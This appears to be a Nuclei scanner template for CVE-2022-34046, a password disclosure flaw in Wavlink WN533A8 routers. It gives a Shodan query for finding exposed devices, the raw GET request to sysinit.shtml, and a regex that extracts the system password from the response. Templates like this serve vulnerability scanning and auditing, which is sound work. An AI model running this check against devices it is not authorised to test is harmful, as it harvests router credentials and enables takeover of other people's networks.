id: CVE-2022-34046 info: name: Wavlink Sysinit.shtml - Password Exposure author: For3stCo1d severity: high description: | An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);]. reference: - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046 - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-34046 cwe-id: CWE-863 metadata: shodan-query: http.title:"Wi-Fi APP Login" verified: "true" tags: cve,cve2022,wavlink,router,exposure requests: - raw: - | GET /sysinit.shtml?r=52300 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - 'var syspasswd="' - 'APP' condition: and - type: status status: - 200 extractors: - type: regex regex: - 'syspasswd="(.+?)"'